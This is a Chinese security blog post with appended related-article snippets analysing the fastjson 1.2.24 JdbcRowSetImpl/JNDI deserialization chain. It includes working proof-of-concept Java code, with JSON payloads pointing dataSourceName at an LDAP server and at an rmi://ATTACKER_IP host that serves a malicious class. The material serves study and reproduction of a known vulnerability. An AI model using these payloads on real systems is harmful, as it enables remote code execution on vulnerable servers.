WEB安全--Java安全--fastjson1.2.24(JdbcRowSetImpl利用链)

最新推荐文章于 2025-08-01 20:45:00 发布
原创 最新推荐文章于 2025-08-01 20:45:00 发布 · 541 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #fastjson #java

一、漏洞介绍

1.1、JdbcRowSetImpl利用链简介

我们通过@type指定系统类JdbcRowSetImpl,但是这个类并不存在命令执行的危险方法,所以要借助JNDI服务使JdbcRowSetImpl类中的lookup方法远程加载我们的恶意类来实现攻击。所以主要是利用JNDI注入达到的攻击。

1.2、JNDI、RMI、LDAP

该攻击过程设计到了JNDI、RMI、LDAP三个知识点,简明扼要地说:JNDI是官方定义的一套接口,而LDAP服务、RMI服务则是对该接口的不同实现方式。

JNDI (Java Naming and Directory Interface)

JNDI(Java命名和目录接口)是Java提供的一套API,用于访问各种命名和目录服务。

LDAP (Lightweight Directory Access Protocol)

轻量级目录访问协议。支持远程访问Java类文件。

RMI (Remote Method Invocation)

Java远程方法调用协议。支持远程访问Java类文件。

二、漏洞分析

为了更好的理解这个漏洞的触发过程,我将介绍两个板块:

JdbcRowSetImpl类接收的JSON字符串

JdbcRowSetImpl类的lookup()方法触发

2.1、JdbcRowSetImpl类接收的JSON字符串

import com.alibaba.fastjson.JSON;

public class vul_JdbcRowSetImpl {
    public static void main(String[] args) {
        String s = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:8085/badClass\", \"autoCommit\":false}";
        JSON.parse(s);
    }
}

这里的JSON字符串中包含了如下信息:

{

@type:com.sun.rowset.JdbcRowSetImpl,

dataSourceName:ldap://127.0.0.1:8085/badClass,

autoCommit:false

}

@type:指定要将JSON字符串解析的模版类

dataSourceName:远程加载的位置,协议:ldap和rmi均可

autoCommit:布尔值,指定的类需要接收处理两个参数

2.2、JdbcRowSetImpl类的lookup()方法触发

通过Json字符串  ————反序列化————>Java对象这个过程,指定的的JdbcRowSetImpl类的

setDataSourceName方法会被触发,并且调用父类的setDataSourceName方法

走进JdbcRowSetImpl类的父类BaseRowSet类,发现该方法就是普通的赋值操作,将我们传递的JSON字符串赋值给dataSource

接着JdbcRowSetImpl类会调用另一个setter方法setAutoCommit,其需要接收一个bool值,但最主要的是该setter方法会调用connect方法

走进connect方法发现其中通过lookup(getDataSourceName())的形式远程加载Java类,并且这个getDataSourceName()所对应的值就是前面的dataSource,也就是远程加载的恶意类位置

三、漏洞实现

在本地编写java主程序模拟客户端

利用yakit的反向连接功能生成存放恶意类的服务器

ldap和rmi服务均可

注意替换地址的准确性,实现命令执行

网络安全--Fastjson1.2.24-RCE漏洞
weixin_46066254的博客
12-04 744
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,autoType标注了类对应的原始类型,方便在反序列化的时候定位到具体类型,fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。因为有了autoType功能,那么fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。
Fastjson 反序列化漏洞[1.2.24-rce]
流水不争先,争的是滔滔不绝
05-28 798
漏洞影响版本【1.2.24之前】
fastjson-1.2.24利用
08-01 1565
这里调用get方法的话也是在toJSON调用(方法返回Connect,过不了判断,不会在生成反序列化器中调用),顺序很清晰。这里要注意dataSourceName的写法,因为fastjson是根据setter和getter获取的属性,所以名字要根据setter和getter的名字写,而不是根据对应属性名写。我们在json中指定@type参数,故fastjson会尝试将该字符串反序列化为指定类的对象,并调用类中的set方法给对象进行赋值,把反序列化后拿到的对象toJSON时用get方法。
Fastjson1.2.24(CVE-2017-18349)分析
鸣蜩十四的博客
09-02 1212
Fastjson1.2.24版本之前存在两条利用,分别是 1. JNDI com.sun.rowset.JdbcRowSetImpl 2. com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 我们本次也是对这两条进行分析和过程复现
fastjson-1.2.24漏洞复现
qq_43599126的博客
07-04 1700
看完利用分析后,我们来总结一下,整体来说就是fastjson是根据@type来进行反序列化类并且没有做任何限制,允许指定@type来反序列化任意类,所以导致了反序列化漏洞。
Java安全-Fastjson漏洞
m0_63138919的博客
03-28 4378
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
fastjson反序列化-1.2.24
qq_51780583的博客
05-17 255
获取地址rmi://172.16.16.92:1099/juyjrv,然后返回浏览器,抓包放入json格式的payload。抓包,然后burp修改文件类型,然后将修改Content-Type为 application/json。通过JNDI注入程序,开启一个rmi服务。然后Kali编写payload。直接拿去到了root权限。访问靶机8090端口。
fastjson1.2.24反序列化漏洞复现 CVE-2017-18349
m0_62284238的博客
09-10 1840
fastjson反序列化漏洞复现 CVE-2017-18349
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用分析(TemplatesImpl,JdbcRowSetImpl
m0_64685672的博客
02-03 2905
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
[Java安全]fastjson1.2.24结合JdbcRowSetImpl利用
Y4tacker的博客
07-15 408
https://zhuanlan.zhihu.com/p/73428357 https://blog.csdn.net/further_eye/article/details/109718241 https://www.freebuf.com/vuls/208339.html
Fabarta个人专属智能体限时体验中:高效、安全的长文写作新搭档
Fabarta的博客
08-01 288
此外,报告还提到了数据孤岛、数据质量不高的问题,这些都阻碍了企业的跨域协同,也降低了企业的数据向知识转化的效率。在保证用户的资料、文件与数据完全私密不泄露的情况下,该产品完美融合了用户本地数据与互联网上可以触达的公开信息,快速应答用户的各类请求与问题。1)王律师基于个人构建好的本地知识库,输入需求:“分析本案胜诉关键点,撰写金融借款合同纠纷证据规则实务指南,引用3个类案,字数2000左右”;5)智能体生成专业化内容,王律师可实时调整个别段落,对不满意的段落进行改写、润色,插入类案对比等;
智能Agent场景实战指南 Day 23 : Agent安全与隐私保护
在未来等你的专栏
07-29 695
智能Agent处理的数据通常包含用户个人信息、商业机密等敏感内容。安全漏洞可能导致数据泄露、模型被攻击等严重后果。保护用户隐私数据不被泄露防止模型被恶意输入攻击(如Prompt Injection)确保API调用的认证和授权安全满足GDPR等合规要求智能Agent安全防护的四个关键层面:数据、模型、API、隐私防Prompt注入的多种技术组合差分隐私在数据收集中的应用医疗等敏感行业的特殊处理要求。
金融专题|某跨境支付机构:以榫卯企业云平台 VPC 功能保障业务主体安全
SmartX 超融合
07-31 651
业务隔离,灵活互访,安全管理,精简运维。
2025数字藏品安全保卫战:高防CDN如何成为NFT应用的“隐形护甲”?
2403_86962125的博客
07-29 1118
2025年全球数字藏品市场突破$1000亿,但安全事件同步激增230%——某头部NFT平台因3.2Tbps DDoS攻击瘫痪,用户无法交易稀有藏品;:当藏品价值飙升时,攻击者早已举起屠刀——唯有前置防御,方能守护数字资产的价值根基!:某平台遭1.8Tbps UDP反射攻击,支付接口瘫痪3小时,用户资产无法转移。:某数字藏品平台接入后成功抵御800Gbps混合攻击,拍卖会0中断。:伪造海量API请求(如查询藏品详情),耗尽服务器连接池。:某平台未支持QUIC协议,海外用户加载延迟>5秒。
【Rust并发集合】如何在多线程中并发安全地使用集合
景天科技苑
07-29 2535
集合类型是我们编程中常用的数据类型,Rust 中提供了一些集合类型,比如`Vec<T>`、`HashMap<K, V>`、`HashSet<T>`、`VecDeque<T>`、`LinkedList<T>`、`BTreeMap<K,V>`、`BTreeSet<T>` 等。 要实现线程安全的 Vec,可以使用 Arc(原子引用计数)和 Mutex(互斥锁)的组合。 Arc 允许多个线程共享拥有相同数据的所有权,而 Mutex 用于在访问数据时进行同步,确保只有一个线程能够修改数据。
Vue3中Markdown解析与渲染的完整解决方案:从安全到性能优化
最新发布
独立开发者阿乐的博客
08-01 1245
Vue3前端适配Markdown的解决方案:本文介绍了在Vue3项目中处理Markdown内容的常见问题和解决方案,包括解析、语法高亮、组件嵌入等。推荐使用markdown-it作为核心解析器,配合highlight.js实现代码高亮,并通过自定义渲染器支持Vue组件。文章提供了完整的实现代码,包括Markdown解析工具类、Vue3渲染组件以及XSS防护措施,同时演示了如何在Markdown中嵌入自定义Vue组件。该方案兼顾功能性、安全性和性能优化,适合各类需要展示Markdown内容的Web应用。
相亲小程序安全与隐私系统模块搭建
ALLSectorSorft的博客
07-31 444
相亲小程序安全与隐私系统设计要点:1. 采用AES加密存储用户敏感信息,严格管理数据库访问权限;2. 使用HTTPS协议传输数据,配合SHA-256哈希验证确保完整性;3. 实现手机/邮箱验证注册,基于角色分配权限(普通用户/管理员);4. 提供隐私设置选项,控制信息可见范围;5. 建立操作日志和实时监控机制。通过以上模块构建多层次安全保障体系,确保用户数据安全与隐私保护,同时需持续进行安全测试优化并遵守相关法律法规。
2025年SDK游戏盾终极解析:重新定义手游安全的“隐形护甲”
2403_86962125的博客
07-28 997
2025年全球手游市场规模突破$2000亿,黑客单次攻击成本却降至$30——某SLG游戏因协议层CC攻击单日流失37%玩家,某开放世界游戏遭低频DDoS瘫痪6小时损失千万。attackCheck: "RELAXED", // 宽松模式(高操作容忍):定位高频攻击IP段(如某棋牌游戏阻断越南IP后攻击↓90%):分析操作轨迹(如移动速度/技能冷却),识别外挂概率>92%:云端流量清洗,被动响应网络层攻击(如SYN Flood):客户端嵌入防护模块,主动拦截应用层威胁(外挂/协议篡改)
聚铭安全管家平台2.0实战解码 | 安服篇(三):配置保障 自动核查
juminfo的博客
07-29 426
SSH端口手动开启、防火墙规则被误删、关键配置遭篡改……人工操作难免疏漏;攻击者持续扫描探测,专门针对"加固后管理真空期"发起攻击。传统加固后依赖人工定期复查,成本高、周期长,漏洞暴露窗口期长达数周;等发现问题时,攻击者早已长驱直入,甚至潜伏数月……“加固不是一劳永逸,而是持续的战斗。”——但这场战斗,不应该靠人力硬扛!对此,聚铭安全管家平台2.0带来了全新解决方案。平台推出的「配置保障」功能,依托自动化核查机制,实现全流程智能监控,同时支持智能加固,确保安全状态始终在线、持续可靠!
fastjson1.2.24漏洞payload
03-17
### 关于 Fastjson 1.2.24 漏洞 Payload 示例 Fastjson 是阿里巴巴开源的一款高性能 JSON 序列化和反序列化工具,在早期版本中存在多个严重的远程代码执行 (RCE) 漏洞。这些漏洞主要源于其 `autoType` 功能未充分校验输入数据,攻击者可以通过构造恶意的 JSON 数据触发 RCE。 #### 已知漏洞背景 在 Fastjson 的 `checkAutoType` 方法中,如果某些特定条件被满足,则可能导致类型绕过并最终实现任意代码执行[^2]。以下是几个典型的场景: - **`expectClass` 参数**:当该参数不为空且不属于预定义的安全类列表时(如 Object.class 或 Serializable.class),可能允许自定义类型的实例化。 - **黑名单机制不足**:早期版本中的黑名单策略基于明文匹配,容易通过变种方式规避检测[^3]。 - **特殊字符过滤缺失**:部分修复尝试仅简单增加了一些关键字检查,但未能全面覆盖所有潜在威胁向量。 #### Payload 构造原理 针对 Fastjson 1.2.24 及更早版本,常见的利用依赖于 Java 类加载器的行为特性以及第三方库的支持。例如,`JdbcRowSetImpl` 被广泛用于演示此类漏洞的影响。下面是一个经典的 POC 实现: ```java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.ParserConfig; public class Exploit { public static void main(String[] args) throws Exception { // 启用 autoType 支持 ParserConfig.getGlobalInstance().setAutoTypeSupport(true); // 恶意 JSON 输入字符串 String poc = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://ATTACKER_IP:1099/Exploit\",\"autoCommit\":true}"; // 执行解析操作 JSON.parse(poc); } } ``` 上述代码片段展示了如何通过指定 `@type` 属性来控制目标对象的具体类型,并结合外部资源注入完成进一步的危害扩展。 > 注意事项 > - 替换掉 `ATTACKER_IP` 占位符为你实际部署的服务地址。 > - 此测试环境需确保隔离措施到位以免造成真实损害。 --- ### 技术细节补充说明 对于更高版本修补后的防御逻辑改进点如下: - 黑名单由原来的纯文本形式转变为哈希值存储结构,从而提高了对抗变形技巧的能力; - 新增了对非法路径分隔符 (`L`, `;`) 的额外筛查环节以减少误报率的同时增强安全性保障水平。 尽管如此,开发者仍应遵循官方建议禁用全局范围内的自动类型转换功能除非绝对必要情况下才开启局部许可权限设置。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值